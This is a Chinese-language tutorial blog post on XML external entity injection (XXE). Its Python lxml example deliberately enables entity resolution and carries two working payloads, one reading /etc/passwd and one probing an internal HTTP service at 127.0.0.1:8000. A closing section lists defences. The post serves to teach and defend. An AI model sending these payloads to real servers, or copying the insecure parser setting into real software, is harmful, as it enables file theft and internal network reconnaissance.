利用 XML 外部实体注入(XXE)读取文件和探测内部网络

利用 XML 外部实体注入(XXE)读取文件和探测内部网络

引言

XML 外部实体注入(XXE)是一种常见的安全漏洞,攻击者可以通过这种漏洞读取服务器上的文件或探测内部网络。本文将通过一个实际的 Python 代码示例,展示如何利用 XXE 漏洞读取 /etc/passwd 文件并探测本地运行的 HTTP 服务器。

什么是 XXE?

XML 外部实体注入(XXE)是指在解析 XML 数据时,如果 XML 解析器启用了外部实体解析功能,攻击者可以注入恶意的 XML 实体来访问服务器上的敏感文件或发起网络请求。这种漏洞通常出现在使用 XML 解析库的应用程序中,特别是在未正确配置解析器的情况下。

代码示例

以下是一个 Python 代码示例,展示了如何利用 XXE 漏洞读取 /etc/passwd 文件并探测本地运行的 HTTP 服务器。

python 复制代码
from lxml import etree
import requests

# XML payload to read /etc/passwd
x = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodcall>
  <methodname>&xxe;</methodname>
</methodcall>
"""

# XML payload to probe internal network (e.g., 127.0.0.1)
x1 = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://127.0.0.1:8000" >]>
<methodcall>
  <methodname>&xxe;</methodname>
</methodcall>
"""

def parse_xml(xml_bytes):
    try:
        # Parse the XML bytes with lxml, which supports external entities
        parser = etree.XMLParser(resolve_entities=True)
        root = etree.fromstring(xml_bytes, parser=parser)
        methodname = root.find('methodname').text
        print(methodname)
    except Exception as e:
        print(f"Error: {e}")

# Parse the first XML string
parse_xml(x)

# Parse the second XML string
parse_xml(x1)

代码解析

  1. XML Payload:

    • xx1 是两个字节字符串,分别包含外部实体 &xxe;
    • x 中的外部实体指向 /etc/passwd 文件。
    • x1 中的外部实体指向 http://127.0.0.1:8000
  2. 解析函数:

    • parse_xml 函数使用 lxml.etree.fromstring 解析字节字符串,并打印 <methodname> 元素的内容。
    • etree.XMLParser(resolve_entities=True) 参数启用外部实体解析。
  3. 解析 XML 字符串:

    • 调用 parse_xml(x) 解析第一个 XML 字节字符串,读取 /etc/passwd 文件内容。
    • 调用 parse_xml(x1) 解析第二个 XML 字节字符串,探测 http://127.0.0.1:8000 的内容。

运行结果

当运行上述代码时,如果成功读取到 /etc/passwd 文件,将会输出文件内容。如果成功探测到 http://127.0.0.1:8000,将会输出该 URL 的响应内容。

如何防御 XXE 漏洞

为了防止 XXE 漏洞,可以采取以下措施:

  1. 禁用外部实体解析 :在解析 XML 时,禁用外部实体解析功能。例如,在 lxml 中,可以使用 etree.XMLParser(resolve_entities=False)
  2. 使用安全的 XML 解析库:选择那些默认不解析外部实体的库。
  3. 输入验证:对用户输入进行严格的验证,确保输入的数据符合预期格式。
  4. 定期更新和打补丁:保持系统和库的最新状态,及时应用安全补丁。

结论

通过上述示例,我们可以看到 XXE 漏洞的潜在危害。了解这些漏洞并采取适当的防御措施对于保护应用程序的安全至关重要。希望本文能够帮助读者更好地理解 XXE 漏洞及其防范方法。

相关推荐
墨白曦煜8 分钟前
HTTP首部字段(速查-全47种)
网络·网络协议·http
MOON404☾5 小时前
基于TCP的简易端口扫描器
网络·tcp/ip·php
lendsomething5 小时前
解决SSL握手失败问题:SSLHandshakeException: Received fatal alert: handshake_failure
网络·网络协议·ssl
bestcxx6 小时前
(二十六)、Kuboard 部署网络问题 &k8s 使用本地镜像 & k8s使用 register本地镜像站 综合应用
网络·容器·kubernetes
红米饭配南瓜汤8 小时前
WebRTC 发送端 SSRC 生成流程总结
网络·网络协议·音视频·webrtc·媒体
余防9 小时前
XXE - 实体注入(xml外部实体注入)
xml·前端·安全·web安全·html
wanhengidc10 小时前
云手机和网盘之间的关系
网络·游戏·智能手机·架构·云计算
歪歪10012 小时前
Http与WebSocket网络通信协议的对比
网络·websocket·网络协议·计算机网络·http·网络安全·信息与通信
ningmengjing_12 小时前
爬虫逆向——RPC技术
网络·网络协议·rpc
David WangYang13 小时前
便宜的自制 30 MHz - 6 GHz 矢量网络分析仪
开发语言·网络·php